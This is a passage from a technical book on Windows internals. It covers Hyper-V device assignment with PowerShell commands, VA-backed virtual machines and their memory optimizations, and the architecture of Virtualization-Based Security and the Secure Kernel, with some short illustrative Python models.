Unrestricted, press Enter, and confirm with Y.
If you execute the downloaded survey-dda.ps1 script, its output should highlight whether
your NVMe device can be reassigned to the guest VM. Here is a valid output example:
Standard NVM Express Controller
Express Endpoint -- more secure.
And its interrupts are message-based, assignment can work.
PCIROOT(0)#PCI(0302)#PCI(0000)
CHAPTER 9 Virtualization technologies
335
Take note of the location path (the PCIROOT(0)#PCI(0302)#PCI(0000) string in the example).
Now we will set the automatic stop action for the target VM as turned-off (a required step for
DDA) and dismount the device. In our example, the VM is called “Vibranium.” Write the following
commands in your PowerShell window (by replacing the sample VM name and device location
with your own):
Set-VM -Name "Vibranium" -AutomaticStopAction TurnOff
Dismount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
In case the last command yields an operation failed error, it is likely that you haven’t disabled the
device. Open Device Manager, locate your NVMe controller (Standard NVM Express Controller
in this example), right-click it, and select Disable Device. Then you can type the last command again.
It should succeed this time. Then assign the device to your VM by typing the following:
Add-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName "Vibranium"
The last command should have completely removed the NVMe controller from the host. You
should verify this by checking the Device Manager in the host system. Now it’s time to power
up the VM. You can use the Hyper-V Manager tool or PowerShell. If you start the VM and get an
error like the following, your BIOS is not properly configured to expose SR-IOV, or your I/O MMU
doesn’t have the required characteristics (most likely it does not support I/O remapping).
Otherwise, the VM should simply boot as expected. In this case, you should be able to see
both the NVMe controller and the NVMe disk listed in the Device Manager applet of the child
VM. You can use the disk management tool to create partitions in the child VM in the same way
you do in the host OS. The NVMe disk will run at full speed with no performance penalties (you
can confirm this by using any disk benchmark tool).
To properly remove the device from the VM and remount it in the host OS, you should first
shut down the VM and then use the following commands (remember to always change the vir-
tual machine name and NVMe controller location):
Remove-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName
"Vibranium"
Mount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
After the last command, the NVMe controller should reappear listed in the Device Manager of
the host OS. You just need to reenable it for restarting to use the NVMe disk in the host.
VA-backed virtual machines
Virtual machines are used for multiple purposes. One of them is to run traditional software in
isolated environments, called containers. (Server and application silos, which are two types of
containers, were introduced in Part 1, Chapter 3, “Processes and jobs.”) Fully isolated containers
(internally named Xenon and Krypton) require fast startup, low overhead, and the lowest possible
memory footprint. The guest physical memory of this type of VM is generally shared between
multiple containers. Good examples of containers are provided by Windows Defender Application
Guard, which uses a container to fully isolate the browser, and by Windows Sandbox, which uses
containers to provide a fully isolated virtual environment. Usually a container shares the VM’s
firmware, operating system and, often, also some of the applications running in it (the shared
components compose the base layer of a container). Running each container in its own private guest
physical memory space would not be feasible and would waste a large amount of physical memory.
To solve the problem, the virtualization stack provides support for VA-backed virtual machines.
VA-backed VMs use the host operating system’s memory manager to provide the guest partition’s
physical memory with advanced features like memory deduplication, memory trimming, direct maps,
memory cloning and, most important, paging (all these concepts have been extensively covered in
Chapter 5 of Part 1). For traditional VMs, guest memory is assigned by the VID driver by statically allo-
cating system physical pages from the host and mapping them in the GPA space of the VM before any
virtual processor has the chance to execute, but for VA-backed VMs, a new layer of indirection is added
between the GPA space and SPA space. Instead of mapping SPA pages directly into the GPA space, the
VID creates a GPA space that is initially blank, creates a user mode minimal process (called VMMEM) for
hosting a VA space, and sets up GPA to VA mappings using MicroVM. MicroVM is a new component of
the NT kernel tightly integrated with the NT memory manager that is ultimately responsible for man-
aging the GPA to SPA mapping by composing the GPA to VA mapping (maintained by the VID) with the
VA to SPA mapping (maintained by the NT memory manager).
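The two-level translation described above can be sketched as a toy Python model (addresses and mappings are invented for illustration; the real structures live in the VID driver and the NT memory manager):

```python
# Toy model of the two-level translation for VA-backed VMs:
# the VID maintains GPA -> VA, the NT memory manager maintains VA -> SPA,
# and MicroVM conceptually composes them into the effective GPA -> SPA map.
PAGE = 0x1000

gpa_to_va = {0x0: 0x7F0000000000, 0x1000: 0x7F0000001000}       # kept by the VID
va_to_spa = {0x7F0000000000: 0x25000, 0x7F0000001000: 0x9C000}  # kept by MM

def gpa_to_spa(gpa):
    """Compose the two mappings for a guest physical address."""
    page, offset = gpa & ~(PAGE - 1), gpa & (PAGE - 1)
    va = gpa_to_va[page]          # GPA -> VA (maintained by the VID)
    spa = va_to_spa[va]           # VA -> SPA (maintained by the NT MM)
    return spa + offset

assert gpa_to_spa(0x1234) == 0x9C234
```

Because the second mapping is ordinary process virtual memory, any page in it can be trimmed, paged out, or shared, which is exactly what gives VA-backed VMs their flexibility.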
The new layer of indirection allows VA-backed VMs to take advantage of most memory manage-
ment features that are exposed to Windows processes. As discussed in the previous section, the VM
Worker process, when it starts the VM, asks the VID driver to create the partition’s memory block. In
case the VM is VA-backed, it creates the Memory Block Range GPA mapping bitmap, which is used to
keep track of the allocated virtual pages backing the new VM’s RAM. It then creates the partition’s RAM
memory, backed by a big range of VA space. The VA space is usually as big as the allocated amount of
VM’s RAM memory (note that this is not a necessary condition: different VA-ranges can be mapped
as different GPA ranges) and is reserved in the context of the VMMEM process using the native
NtAllocateVirtualMemory API.
If the “deferred commit” optimization is not enabled (see the next section for more details), the VID
driver performs another call to the NtAllocateVirtualMemory API with the goal of committing the en-
tire VA range. As discussed in Chapter 5 of Part 1, committing memory charges the system commit limit
but still doesn’t allocate any physical page (all the PTE entries describing the entire range are invalid
demand-zero PTEs). The VID driver at this stage uses Winhvr to ask the hypervisor to map the entire
partition’s GPA space to a special invalid SPA (by using the same HvMapGpaPages hypercall used for
standard partitions). When the guest partition accesses guest physical memory that is mapped in the
SLAT table by the special invalid SPA, it causes a VMEXIT to the hypervisor, which recognizes the special
value and injects a memory intercept to the root partition.
The VID driver finally notifies MicroVM of the new VA-backed GPA range by invoking the
VmCreateMemoryRange routine (MicroVM services are exposed by the NT kernel to the VID driver
through a kernel extension). MicroVM allocates and initializes a VM_PROCESS_CONTEXT data structure, which
contains two important RB trees: one describing the allocated GPA ranges in the VM and one describ-
ing the corresponding system virtual address (SVA) ranges in the root partition. A pointer to the al-
located data structure is then stored in the EPROCESS of the VMMEM instance.
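The two range trees can be illustrated with a toy stand-in. The real VM_PROCESS_CONTEXT uses RB trees; a sorted list queried with bisect gives the same O(log n) range-lookup idea, and the ranges below are invented:

```python
# Toy stand-in for one of the range trees in VM_PROCESS_CONTEXT.
import bisect

class RangeMap:
    """Sorted, non-overlapping ranges with logarithmic point lookup."""
    def __init__(self):
        self.starts, self.ranges = [], []

    def insert(self, start, length, value):
        i = bisect.bisect_left(self.starts, start)
        self.starts.insert(i, start)
        self.ranges.insert(i, (start, length, value))

    def lookup(self, addr):
        i = bisect.bisect_right(self.starts, addr) - 1
        if i >= 0:
            start, length, value = self.ranges[i]
            if start <= addr < start + length:
                return value
        return None            # address not covered by any range

gpa_ranges = RangeMap()        # allocated GPA ranges in the VM
gpa_ranges.insert(0x0, 0x100000, "ram-low")
gpa_ranges.insert(0xF0000000, 0x10000, "mmio")

assert gpa_ranges.lookup(0x1234) == "ram-low"
assert gpa_ranges.lookup(0x200000) is None
```

The second tree (root-partition SVA ranges) would be a second RangeMap instance keyed by system virtual addresses.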
When the VM Worker process wants to write into the memory of the VA-backed VM, or when a
memory intercept is generated due to an invalid GPA to SPA translation, the VID driver calls into the
MicroVM page fault handler (VmAccessFault). The handler performs two important operations: first,
it resolves the fault by inserting a valid PTE in the page table describing the faulting virtual page (more
details in Chapter 5 of Part 1) and then updates the SLAT table of the child VM (by calling the WinHvr
driver, which emits another HvMapGpaPages hypercall). Afterward, the VM’s guest physical pages can
be paged out simply because private process memory is normally pageable. This has the important
implication that most of MicroVM’s functions must operate at passive IRQL.
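The two steps the fault handler performs can be sketched as a toy model (all data structures and the free-SPA allocator are invented; the real work happens in the NT memory manager and via the HvMapGpaPages hypercall):

```python
# Toy sketch of the MicroVM page fault handler (VmAccessFault):
# step 1 makes the host PTE valid; step 2 updates the child VM's SLAT entry.
INVALID_SPA = -1

page_table = {0x7F0000000000: None}   # host PTEs (None = invalid demand-zero)
slat = {0x0: INVALID_SPA}             # child VM GPA -> SPA
gpa_to_va = {0x0: 0x7F0000000000}     # GPA -> VA mapping kept by the VID
next_free_spa = [0x40000]             # trivial stand-in for page allocation

def vm_access_fault(gpa):
    va = gpa_to_va[gpa]
    if page_table[va] is None:        # step 1: resolve the host page fault
        page_table[va] = next_free_spa[0]
        next_free_spa[0] += 0x1000
    slat[gpa] = page_table[va]        # step 2: update SLAT (HvMapGpaPages)
    return slat[gpa]

spa = vm_access_fault(0x0)
assert spa == 0x40000 and slat[0x0] == 0x40000
```

Note the ordering: the SLAT entry can only be filled after the host-side PTE is valid, which is why the handler must run at passive IRQL.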
Multiple services of the NT memory manager can be used for VA-backed VMs. In particular, clone
templates allow the memory of two different VA-backed VMs to be quickly cloned; direct map allows
shared executable images or data files to have their section objects mapped into the VMMEM process
and into a GPA range pointing to that VA region. The underlying physical pages can be shared between
different VMs and host processes, leading to improved memory density.
VA-backed VMs optimizations
As introduced in the previous section, the cost of a guest access to dynamically backed memory that
isn’t currently backed, or does not grant the required permissions, can be quite expensive: when a
guest access attempt is made to inaccessible memory, a VMEXIT occurs, which requires the hypervisor
to suspend the guest VP, schedule the root partition’s VP, and inject a memory intercept message to
it. The VID’s intercept callback handler is invoked at high IRQL, but processing the request and call-
ing into MicroVM requires running at PASSIVE_LEVEL. Thus, a DPC is queued. The DPC routine sets an
event that wakes up the appropriate thread in charge of processing the intercept. After the MicroVM
page fault handler has resolved the fault and called the hypervisor to update the SLAT entry (through
another hypercall, which produces another VMEXIT), it resumes the guest’s VP.
Large numbers of memory intercepts generated at runtime result in big performance penalties.
To avoid this, multiple optimizations have been implemented in the form of guest
enlightenments (or simple configurations):
- Memory zeroing enlightenments
- Memory access hints
- Enlightened page fault
- Deferred commit and other optimizations
Memory-zeroing enlightenments
To avoid information disclosure to a VM of memory artifacts previously in use by the root partition
or another VM, memory-backing guest RAM is zeroed before being mapped for access by the guest.
Typically, an operating system zeroes all physical memory during boot because on a physical system
the contents are nondeterministic. For a VM, this means that memory may be zeroed twice: once by the
virtualization host and again by the guest operating system. For physically backed VMs, this is at best a
waste of CPU cycles. For VA-backed VMs, the zeroing by the guest OS generates costly memory inter-
cepts. To avoid the wasted intercepts, the hypervisor exposes the memory-zeroing enlightenments.
When the Windows Loader loads the main operating system, it uses services provided by the UEFI
firmware to get the machine’s physical memory map. When the hypervisor starts a VA-backed VM, it
exposes the HvGetBootZeroedMemory hypercall, which the Windows Loader can use to query the list
of physical memory ranges that are actually already zeroed. Before transferring the execution to the
NT kernel, the Windows Loader merges the obtained zeroed ranges with the list of physical memory
descriptors obtained through EFI services and stored in the Loader block (further details on startup
mechanisms are available in Chapter 12). The NT kernel inserts the merged descriptors directly into the
zeroed pages list, skipping the initial memory zeroing.
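The merge step can be illustrated with a highly simplified toy model (ranges are matched exactly for brevity, and the descriptor values are invented; the real code merges arbitrary overlapping ranges):

```python
# Toy model of the boot memory-zeroing enlightenment: ranges reported as
# already zeroed (via HvGetBootZeroedMemory) skip the initial zeroing pass.
descriptors = [(0x0, 0x8000), (0x10000, 0x8000)]   # (base, length) from EFI
hv_zeroed = [(0x10000, 0x8000)]                    # reported by the hypercall

zeroed_list, to_zero = [], []
for base, length in descriptors:
    if (base, length) in hv_zeroed:
        zeroed_list.append((base, length))  # inserted directly, no zeroing
    else:
        to_zero.append((base, length))      # must be zeroed by the NT kernel

assert zeroed_list == [(0x10000, 0x8000)]
assert to_zero == [(0x0, 0x8000)]
```

Every range that lands on `zeroed_list` represents guest pages that would otherwise have been zeroed twice, once by the host and once by the guest.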
In a similar way, the hypervisor supports the hot-add memory zeroing enlightenment with a simple
implementation: When the dynamic memory VSC driver (dmvsc.sys) initiates the request to add physi-
cal memory to the NT kernel, it specifies the MM_ADD_PHYSICAL_MEMORY_ALREADY_ZEROED flag,
which hints the Memory Manager (MM) to add the new pages directly to the zeroed pages list.
Memory access hints
For physically backed VMs, the root partition has very limited information about how guest MM
intends to use its physical pages. For these VMs, the information is mostly irrelevant because almost
all memory and GPA mappings are created when the VM is started, and they remain statically mapped.
For VA-backed VMs, this information can instead be very useful because the host memory manager
manages the working set of the minimal process that contains the VM’s memory (VMMEM).
The hot hint allows the guest to indicate that a set of physical pages should be mapped into the
guest because they will be accessed soon or frequently. This implies that the pages are added to the
working set of the minimal process. The VID handles the hint by telling MicroVM to fault in the physical
pages immediately and not to remove them from the VMMEM process’s working set.
In a similar way, the cold hint allows the guest to indicate that a set of physical pages should be un-
mapped from the guest because they will not be used soon. The VID driver handles the hint by forwarding
it to MicroVM, which immediately removes the pages from the working set. Typically, the guest uses
the cold hint for pages that have been zeroed by the background zero page thread (see Chapter 5 of
Part 1 for more details).
The VA-backed guest partition specifies a memory hint for a page by using the HvMemoryHeatHint
hypercall.
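The effect of the two hints can be sketched as a toy model (the function is an invented stand-in for what the VID asks MicroVM to do, not the actual hypercall interface):

```python
# Toy model of the hot/cold memory access hints: a hot hint faults pages
# into the VMMEM working set; a cold hint removes them immediately.
working_set = set()

def memory_heat_hint(pages, hint):
    """Illustrative stand-in for the VID forwarding a heat hint to MicroVM."""
    if hint == "hot":
        working_set.update(pages)             # fault in, keep resident
    elif hint == "cold":
        working_set.difference_update(pages)  # trim from the working set

memory_heat_hint({0x1000, 0x2000}, "hot")
memory_heat_hint({0x2000}, "cold")
assert working_set == {0x1000}
```

In the real system the working set belongs to the VMMEM minimal process, so these hints directly influence which backing pages the host memory manager keeps resident.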
Enlightened page fault (EPF)
Enlightened page fault (EPF) handling is a feature that allows the VA-backed guest partition to resched-
ule threads on a VP that caused a memory intercept for a VA-backed GPA page. Normally, a memory
intercept for such a page is handled by synchronously resolving the access fault in the root partition
and resuming the VP upon access fault completion. When EPF is enabled and a memory intercept oc-
curs for a VA-backed GPA page, the VID driver in the root partition creates a background worker thread
that calls the MicroVM page fault handler and delivers a synchronous exception (not to be confused with
an asynchronous interrupt) to the guest’s VP, with the goal of letting it know that the current thread caused
a memory intercept.
The guest reschedules the thread; meanwhile, the host is handling the access fault. Once the access
fault has been completed, the VID driver will add the original faulting GPA to a completion queue and
deliver an asynchronous interrupt to the guest. The interrupt causes the guest to check the completion
queue and unblock any threads that were waiting on EPF completion.
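The EPF flow above can be sketched as a toy model (the queue, thread names, and functions are invented; the real mechanism uses a synchronous exception plus an asynchronous interrupt):

```python
# Toy model of enlightened page fault (EPF): the guest parks the faulting
# thread, the host resolves the fault in the background, and an async
# interrupt makes the guest drain the completion queue and unblock threads.
from collections import deque

completion_queue = deque()
blocked_threads = {}                  # faulting GPA -> parked thread

def guest_fault(thread, gpa):
    blocked_threads[gpa] = thread     # guest reschedules, runs other work

def host_resolve(gpa):
    completion_queue.append(gpa)      # VID adds the GPA once fault is fixed

def guest_interrupt():
    unblocked = []
    while completion_queue:           # guest checks the completion queue
        gpa = completion_queue.popleft()
        unblocked.append(blocked_threads.pop(gpa))
    return unblocked

guest_fault("thread-A", 0x5000)
host_resolve(0x5000)
assert guest_interrupt() == ["thread-A"]
```

The benefit is that the guest VP keeps doing useful work while the host handles the access fault, instead of spinning inside a suspended VMEXIT.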
Deferred commit and other optimizations
Deferred commit is an optimization that, if enabled, forces the VID driver not to commit each backing
page until first access. This potentially allows more VMs to run simultaneously without increasing the
size of the page file; but, because the backing VA space is only reserved, not committed, the VMs may
crash at runtime when the commit limit is reached in the root partition and no more memory
is available.
Other optimizations are available to set the size of the pages which will be allocated by the MicroVM
page fault handler (small versus large) and to pin the backing pages upon first access. This prevents
aging and trimming, generally resulting in more consistent performance, but consumes more memory
and reduces the memory density.
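The deferred-commit trade-off can be illustrated with a toy accounting model (the limit and page counts are artificial):

```python
# Toy model of deferred commit: commit charge is taken per page on first
# access instead of up front, so more VMs can start, but a late access can
# fail if the commit limit has been reached in the meantime.
COMMIT_LIMIT = 4           # pages, artificially small for the example
committed = [0]

def first_access(pages_needed=1):
    """Charge commit on first touch of a backing page."""
    if committed[0] + pages_needed > COMMIT_LIMIT:
        raise MemoryError("commit limit reached at runtime")
    committed[0] += pages_needed

for _ in range(4):
    first_access()         # succeeds while the charge fits the limit
try:
    first_access()         # the fifth page exceeds the limit
    failed = False
except MemoryError:
    failed = True
assert failed and committed[0] == 4
```

With up-front commit, the failure would instead happen at VM start; deferred commit trades that predictable failure for a possible runtime one.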
The VMMEM process
The VMMEM process exists for two main reasons:
- It hosts the VP-dispatch thread loop when the root scheduler is enabled, which represents the guest VP schedulable unit.
- It hosts the VA space for the VA-backed VMs.
The VMMEM process is created by the VID driver while creating the VM’s partition. As for regular
partitions (see the previous section for details), the VM Worker process initializes the VM setup through
the VID.dll library, which calls into the VID through an IOCTL. If the VID driver detects that the new par-
tition is VA-backed, it calls into the MicroVM (through the VsmmNtSlatMemoryProcessCreate function)
to create the minimal process. MicroVM uses the PsCreateMinimalProcess function, which allocates
the process, creates its address space, and inserts the process into the process list. It then reserves the
bottom 4 GB of address space to ensure that no direct-mapped images end up there (this can reduce
the entropy and security for the guest). The VID driver applies a specific security descriptor to the new
VMMEM process; only the SYSTEM and the VM Worker process can access it. (The VM Worker process
is launched with a specific token; the token’s owner is set to a SID generated from the VM’s unique
GUID.) This is important because the virtual address space of the VMMEM process could have been
accessible to anyone otherwise. By reading the process virtual memory, a malicious user could read the
VM private guest physical memory.
Virtualization-based security (VBS)
As discussed in the previous section, Hyper-V provides the services needed for managing and running
virtual machines on Windows systems. The hypervisor guarantees the necessary isolation between
each partition. In this way, a virtual machine can’t interfere with the execution of another one. In this
section, we describe another important component of the Windows virtualization infrastructure: the
Secure Kernel, which provides the basic services for the virtualization-based security.
First, we list the services provided by the Secure Kernel and its requirements, and then we describe
its architecture and basic components. Furthermore, we present some of its basic internal data struc-
tures. Then we discuss the Secure Kernel and Virtual Secure Mode startup method, describing its high
dependency on the hypervisor. We conclude by analyzing the components that are built on top
of the Secure Kernel, like the Isolated User Mode, Hypervisor Enforced Code Integrity, the secure software
enclaves, secure devices, and Windows kernel hot-patching and microcode services.
Virtual trust levels (VTLs) and Virtual Secure Mode (VSM)
As discussed in the previous section, the hypervisor uses the SLAT to maintain each partition in its
own memory space. The operating system that runs in a partition accesses memory in the standard
way (guest virtual addresses are translated into guest physical addresses by using page tables).
Under the covers, the hardware translates all the partition’s GPAs to real SPAs and then performs the
actual memory access. This last translation layer is maintained by the hypervisor, which uses a separate
SLAT table per partition. In a similar way, the hypervisor can use SLAT to create different security
domains in a single partition. Thanks to this feature, Microsoft designed the Secure Kernel, which is
the base of the Virtual Secure Mode.
Traditionally, the operating system has had a single physical address space, and the software run-
ning at ring 0 (that is, kernel mode) could have access to any physical memory address. Thus, if any
software running in supervisor mode (kernel, drivers, and so on) becomes compromised, the entire
system becomes compromised too. Virtual secure mode leverages the hypervisor to provide new trust
boundaries for systems software. With VSM, security boundaries (described by the hypervisor using
SLAT) can be put in place that limit the resources supervisor mode code can access. Thus, with VSM,
even if supervisor mode code is compromised, the entire system is not compromised.
VSM provides these boundaries through the concept of virtual trust levels (VTLs). At its core, a VTL is
a set of access protections on physical memory. Each VTL can have a different set of access protections.
In this way, VTLs can be used to provide memory isolation. A VTL’s memory access protections can be
configured to limit what physical memory a VTL can access. With VSM, a virtual processor is always
running at a particular VTL and can access only physical memory that is marked as accessible through
the hypervisor SLAT. For example, if a processor is running at VTL 0, it can only access memory as
controlled by the memory access protections associated with VTL 0. This memory access enforcement
happens at the guest physical memory translation level and thus cannot be changed by supervisor
mode code in the partition.
VTLs are organized as a hierarchy. Higher levels are more privileged than lower levels, and higher
levels can adjust the memory access protections for lower levels. Thus, software running at VTL 1 can
adjust the memory access protections of VTL 0 to limit what memory VTL 0 can access. This allows
software at VTL 1 to hide (isolate) memory from VTL 0. This is an important concept that is the basis of
the VSM. Currently the hypervisor supports only two VTLs: VTL 0 represents the Normal OS execution
environment, which the user interacts with; VTL 1 represents the Secure Mode, where the Secure Kernel
and Isolated User Mode (IUM) runs. Because VTL 0 is the environment in which the standard operating
system and applications run, it is often referred to as the normal mode.
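The VTL protection model described above can be sketched with a toy Python model (the protection tables and functions are invented for illustration; real protections live in the hypervisor's per-VTL SLAT tables):

```python
# Toy model of per-VTL memory access protections: a VP running at a given
# VTL can touch a page only if that VTL's protections allow it, and a
# higher VTL can tighten a lower VTL's protections.
protections = {
    0: {0x1000: "rw", 0x2000: None},   # VTL 0: page 0x2000 hidden from it
    1: {0x1000: "rw", 0x2000: "rw"},   # VTL 1 can access everything
}

def access(vtl, page, mode="r"):
    """Check whether software at this VTL may access the page."""
    prot = protections[vtl].get(page)
    return prot is not None and mode in prot

def vtl1_hide_page(page):
    protections[0][page] = None        # VTL 1 adjusts VTL 0's protections

assert access(1, 0x2000) and not access(0, 0x2000)
vtl1_hide_page(0x1000)
assert not access(0, 0x1000) and access(1, 0x1000)
```

The key property the sketch captures is asymmetry: VTL 1 can remove pages from VTL 0's view, but nothing running at VTL 0 can modify the table that enforces this.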
Note The VSM architecture was initially designed to support a maximum of 16 VTLs. At
the time of this writing, only 2 VTLs are supported by the hypervisor. In the future, it could
be possible that Microsoft will add one or more new VTLs. For example, latest versions
of Windows Server running in Azure also support Confidential VMs, which run their Host
Compatibility Layer (HCL) in VTL 2.
Each VTL has the following characteristics associated with it:
- Memory access protection: As already discussed, each virtual trust level has a set of guest physical memory access protections, which defines how the software can access memory.
- Virtual processor state: A virtual processor shares some registers across VTLs, whereas some other registers are private to each VTL. The private virtual processor state for a VTL cannot be accessed by software running at a lower VTL. This allows for isolation of the processor state between VTLs.
- Interrupt subsystem: Each VTL has a unique interrupt subsystem (managed by the hypervisor’s synthetic interrupt controller). A VTL’s interrupt subsystem cannot be accessed by software running at a lower VTL. This allows interrupts to be managed securely at a particular VTL without risk of a lower VTL generating unexpected interrupts or masking interrupts.
Figure 9-30 shows a scheme of the memory protection provided by the hypervisor to the Virtual
Secure Mode. The hypervisor represents each VTL of the virtual processor through a different VMCS
data structure (see the previous section for more details), which includes a specific SLAT table. In this
way, software that runs in a particular VTL can access just the physical memory pages assigned to its
level. The important concept is that the SLAT protection is applied to the physical pages and not to the
virtual pages, which are protected by the standard page tables.
[Figure content: for each virtual processor (VP 0 and VP 1) in the host partition, the hypervisor maintains two VMCS data structures, one per VTL, each pointing to its own EPT (SLAT) table; the VTL 0 and VTL 1 memory access protections define the guest physical to system physical memory map (GPA -> SPA), with shared registers and a per-VTL local APIC, plus separate normal mode and secure mode devices.]
FIGURE 9-30 Scheme of the memory protection architecture provided by the hypervisor to VSM.
Services provided by the VSM and requirements
Virtual Secure Mode, which is built on top of the hypervisor, provides the following services to the
Windows ecosystem:
I
Isolation IUM provides a hardware-based isolated environment for each software that runs
in VTL 1. Secure devices managed by the Secure Kernel are isolated from the rest of the system
and run in VTL 1 user mode. Software that runs in VTL 1 usually stores secrets that can’t be inter-
cepted or revealed in VTL 0. This service is used heavily by Credential Guard. Credential Guard
is the feature that stores all the system credentials in the memory address space of the LsaIso
trustlet, which runs in VTL 1 user mode.
I
Control over VTL 0 The Hypervisor Enforced Code Integrity (HVCI) checks the integrity and
the signing of each module that the normal OS loads and runs. The integrity check is done
entirely in VTL 1 (which has access to all the VTL 0 physical memory). No VTL 0 software can in-
terfere with the signing check. Furthermore, HVCI guarantees that all the normal mode memory
pages that contain executable code are marked as not writable (this feature is called W^X. Both
HVCI and W^X have been discussed in Chapter 7 of Part 1).
CHAPTER 9 Virtualization technologies
343
I
Secure intercepts VSM provides a mechanism to allow a higher VTL to lock down critical sys-
tem resources and prevent access to them by lower VTLs. Secure intercepts are used extensively
by HyperGuard, which provides another protection layer for the VTL 0 kernel by stopping mali-
cious modifications of critical components of the operating systems.
I
VBS-based enclaves A security enclave is an isolated region of memory within the address
space of a user mode process. The enclave memory region is not accessible even to higher
privilege levels. The original implementation of this technology was using hardware facilities
to properly encrypt memory belonging to a process. A VBS-based enclave is a secure enclave
whose isolation guarantees are provided using VSM.
I
Kernel Control Flow Guard VSM, when HVCI is enabled, provides Control Flow Guard
(CFG) to each kernel module loaded in the normal world (and to the NT kernel itself). Kernel
mode software running in normal world has read-only access to the bitmap, so an exploit
can’t potentially modify it. Thanks to this reason, kernel CFG in Windows is also known as
Secure Kernel CFG (SKCFG).
Note  CFG is the Microsoft implementation of Control Flow Integrity, a technique that prevents a wide variety of malicious attacks from redirecting the flow of execution of a program. Both user mode and kernel mode CFG have been discussed extensively in Chapter 7 of Part 1.
■ Secure devices  Secure devices are a new kind of device that are mapped and managed entirely by the Secure Kernel in VTL 1. Drivers for these devices work entirely in VTL 1 user mode and use services provided by the Secure Kernel to map the device I/O space.
To be properly enabled and work correctly, VSM has some hardware requirements. The host system must support virtualization extensions (Intel VT-x, AMD SVM, or ARM TrustZone) and SLAT. VSM won't work if either of these hardware features is not present in the system processor. Some other hardware features are not strictly necessary, but if they are absent, some security guarantees of VSM can't be upheld:
■ An IOMMU is needed to protect against physical device DMA attacks. If the system processors don't have an IOMMU, VSM can still work but is vulnerable to these physical device attacks.
■ A UEFI BIOS with Secure Boot enabled is needed to protect the boot chain that leads to the startup of the hypervisor and the Secure Kernel. If Secure Boot is not enabled, the system is vulnerable to boot attacks, which can modify the integrity of the hypervisor and Secure Kernel before they have a chance to execute.
Some other components are optional, but when they're present they increase the overall security and responsiveness of the system. The presence of a TPM is a good example. It is used by the Secure Kernel to store the Master Encryption Key and to perform Secure Launch (also known as DRTM; see Chapter 12 for more details). Another hardware feature that can improve VSM responsiveness is the processor's Mode-Based Execute Control (MBEC) support: MBEC is used when HVCI is enabled to protect the execution state of user mode pages in kernel mode. With hardware MBEC, the hypervisor
can set the executable state of a physical memory page based on the CPL (kernel or user) domain of
the specific VTL. In this way, memory that belongs to user mode application can be physically marked
executable only by user mode code (kernel exploits can no longer execute their own code located in
the memory of a user mode application). If hardware MBEC is not present, the hypervisor needs to emulate it by using two different SLAT tables for VTL 0 and switching between them when code execution changes the CPL security domain (going from user mode to kernel mode and vice versa produces a VMEXIT in this case). More details on HVCI were discussed in Chapter 7 of Part 1.
EXPERIMENT: Detecting VBS and its provided services
In Chapter 12, we discuss the VSM startup policy and provide the instructions to manually enable
or disable Virtualization-Based Security. In this experiment, we determine the state of the differ-
ent features provided by the hypervisor and the Secure Kernel. VBS is a technology that is not
directly visible to the user. The System Information tool distributed with the base Windows instal-
lation is able to show the details about the Secure Kernel and its related technologies. You can
start it by typing msinfo32 in the Cortana search box. Be sure to run it as Administrator; certain
details require a full-privileged user account.
In the following figure, VBS is enabled and includes HVCI (specified as Hypervisor Enforced Code Integrity), UEFI runtime virtualization (specified as UEFI Readonly), and MBEC (specified as Mode Based Execution Control). However, the system described in the example does not have Secure Boot enabled and does not have a working IOMMU (specified as DMA Protection in the Virtualization-Based Security Available Security Properties line).
More details about how to enable, disable, and lock the VBS configuration are available in the
“Understanding the VSM policy” experiment of Chapter 12.
The Secure Kernel
The Secure Kernel is implemented mainly in the securekernel.exe file and is launched by the Windows
Loader after the hypervisor has already been successfully started. As shown in Figure 9-31, the Secure
Kernel is a minimal OS that works strictly with the normal kernel, which resides in VTL 0. As for any
normal OS, the Secure Kernel runs in CPL 0 (also known as ring 0 or kernel mode) of VTL 1 and provides
services (the majority of them through system calls) to the Isolated User Mode (IUM), which lives
in CPL 3 (also known as ring 3 or user mode) of VTL 1. The Secure Kernel has been designed to be
as small as possible with the goal of reducing the external attack surface. It's not extensible with external device drivers like the normal kernel. The only kernel modules that extend its functionality are loaded by the Windows Loader before VSM is launched and are imported by securekernel.exe:
■ Skci.dll  Implements the Hypervisor Enforced Code Integrity part of the Secure Kernel
■ Cng.sys  Provides the cryptographic engine to the Secure Kernel
■ Vmsvcext.dll  Provides support for the attestation of the Secure Kernel components in Intel TXT (Trusted Boot) environments (more information about Trusted Boot is available in Chapter 12)
While the Secure Kernel is not extensible, Isolated User Mode includes specialized processes called Trustlets. Trustlets are isolated from each other and have specialized digital signature requirements. They can communicate with the Secure Kernel through syscalls and with the normal world through Mailslots and ALPC. Isolated User Mode is discussed later in this chapter.
[Figure 9-31 depicts VSM Normal Mode (VTL 0), where the NT kernel (NTOS) and normal processes A and B run in kernel mode (ring 0) and user mode (ring 3), side by side with VSM Secure Mode (VTL 1), where the Secure Kernel and isolated processes C and D run; the hypervisor sits underneath both worlds.]
FIGURE 9-31  Virtual Secure Mode architecture scheme, built on top of the hypervisor.
Virtual interrupts
When the hypervisor configures the underlying virtual partitions, it requires that the physical proces-
sors produce a VMEXIT every time an external interrupt is raised by the CPU physical APIC (Advanced
Programmable Interrupt Controller). The hardware’s virtual machine extensions allow the hypervisor
to inject virtual interrupts to the guest partitions (more details are in the Intel, AMD, and ARM user
manuals). Thanks to these two facts, the hypervisor implements the concept of a Synthetic Interrupt
Controller (SynIC). A SynIC can manage two kinds of interrupts. Virtual interrupts are interrupts delivered to a guest partition's virtual APIC. A virtual interrupt can represent and be associated with a
physical hardware interrupt, which is generated by the real hardware. Otherwise, a virtual interrupt can
represent a synthetic interrupt, which is generated by the hypervisor itself in response to certain kinds
of events. The SynIC can map physical interrupts to virtual ones. A VTL has a SynIC associated with each
virtual processor in which the VTL runs. At the time of this writing, the hypervisor has been designed to
support 16 different synthetic interrupt vectors (only 2 are actually in use, though).
When the system starts (phase 1 of the NT kernel’s initialization) the ACPI driver maps each inter-
rupt to the correct vector using services provided by the HAL. The NT HAL is enlightened and knows
whether it’s running under VSM. In that case, it calls into the hypervisor for mapping each physical in-
terrupt to its own VTL. Even the Secure Kernel could do the same. At the time of this writing, though, no
physical interrupts are associated with the Secure Kernel (this can change in the future; the hypervisor
already supports this feature). The Secure Kernel instead asks the hypervisor to receive only the follow-
